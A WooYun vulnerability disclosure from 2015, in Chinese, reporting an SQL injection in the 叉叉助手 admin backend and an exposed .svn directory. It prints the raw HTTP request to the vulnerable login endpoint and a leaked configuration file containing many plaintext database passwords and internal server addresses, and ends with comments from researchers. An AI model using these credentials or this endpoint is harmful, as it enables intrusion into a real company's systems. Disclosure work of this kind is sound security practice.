当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115080

漏洞标题:叉叉助手某管理后台SQL注入/源码泄露等安全漏洞

相关厂商:xxzhushou.cn

漏洞作者: mango

提交时间:2015-05-20 10:46

修复时间:2015-05-25 10:48

公开时间:2015-05-25 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

叉叉助手某管理后台SQL注入/源码泄露等安全漏洞

详细说明:

WooYun: 叉叉助手APP客户端xss盲打管理员(已入后台)
看这里 发现存在sql注入

POST /man/action/admin_action.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://125.88.168.100:9091/man/admin_login.php
Cookie: PHPSESSID=rju5kba31k3qn5h0se2ih33na4
Host: 125.88.168.100:9091
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
action=check_passwd&admin_pwd=1&admin_user_name=1&from=form


admin_user_name 参数问题

EQ8T}`%L87$HWWNM0JHMI(Y.png


PTDAK8(MUH}F`7P3UGT2K%G.png


漏洞证明:

2033Q4CW5DDHD4(YAL@4[3B.png


并且此战还存在.svn泄漏

IRHI2EGX_S0DHNY8KG}JUGP.png


$DB_CONFIG = array(
'read' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'analytics',
'charset' => 'utf8'
)
//多个从库在这里填写
),
'write' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'analytics',
'charset' => 'utf8'
)
),
'api_backend' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'testXXDb',
'password' => 'testXXDb123',
'port' => 3306,
'dbname' => 'testXXDb',
'charset' => 'utf8'
)
),
'api_feedback' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.130',
'user' => 'api_flamingo',
'password' => 'lad9Ad9@3^ladk*A',
'port' => 3306,
'dbname' => 'XXFeedBack',
'charset' => 'utf8'
)
),
'analyticsUser' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'XXUser',
'charset' => 'utf8'
)
),
'statistics' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'XXStatistics',
'charset' => 'utf8'
)
),
'package' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'package',
'charset' => 'utf8'
)
),
'eventlog' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'eventlog',
'charset' => 'utf8',
'persistency' => true
)
),
'bbs' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxbbs',
'password' => 'xxBbs789!3',
'port' => 3306,
'dbname' => 'XXBbs',
'charset' => 'utf8',
)
),
'testUserWrite' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'testXXUser',
'password' => 'testXXUser123',
'port' => 3306,
'dbname' => 'testXXUser',
'charset' => 'utf8'
),
),
'testGuopan' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'testGuopan',
'password' => 'testGp123@',
'port' => 3306,
'dbname' => 'testGuopan',
'charset' => 'utf8'
),
),
//更多数据库在这里填写
);
/////////////////////////////////////////////////////////////////////
//缓存配置, use_config 为0表示使用第一项配置,为1表示使用第2项
$CACHE_CONFIG = array(
'use_config' => 'memcache' ,
'memcache' =>
array('type' => 'memcache',
'server' => array(
// array('host' =>'server1', 'port' => '11211', 'weight' => '10'),
array('host' =>'192.168.1.130', 'port' => '11211', 'weight' => '10')
),
'ttl' => 7200,
'compress' => false,
),
'file' =>
array('type' => 'file',
'cache_dir'=> SYSDIR_CACHE . '/tmp/',
'ttl' => 600,
)
);

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////
//SESSION配置, use_config 为0表示使用第一项配置,为1表示使用第2项
$SESSION_CONFIG = array(
'use_config' => 'memcache' ,
'memcache' =>
array('type' => 'memcache',
'save_path' => 'tcp://192.168.1.130:11210',
'cache_expire' => 7200, //minutes
),
'files' =>
array('type' => 'files',
'save_path' => SYSDIR_CACHE . '/sessions/',
'cache_expire' => 180, //minutes
)
);
/////////////////////////////////////////////////////////////////////
//REDIS配置 主要用于统计类的集合
$REDIS_CONFIG = array(
'write' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'password' => '',
),
),
'read' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'password' => '',
),
),
'api' => array(
array(
'host' => '192.168.1.132',
'port' => '6379',
'password' => '',
),
),
'testUser' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'password' => '',
),
),
'user' => array(
array(
'host' => '192.168.1.130',
'port' => '6379',
'password' => '',
),
),
'testDm_level' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'dbN' => 1,
'password' => '',
),
),
);
?>

修复方案:

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-25 10:48

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-20 22:29 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    http://wooyun.org/bugs/wooyun-2015-0115085这个也是你们的

  2. 2015-05-23 09:28 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    @mango 这个厂商的漏洞全都都是忽略 我擦

  3. 2015-05-23 09:51 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @j2ck3r 没事~~乌云会补rank

  4. 2015-05-23 12:10 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    @mango 我从来都没见过忽略后给我补过rank

  5. 2015-05-23 14:18 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @j2ck3r 上个月 就执行了

  6. 2015-05-23 15:10 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    @mango 为什么我没有得到补的rank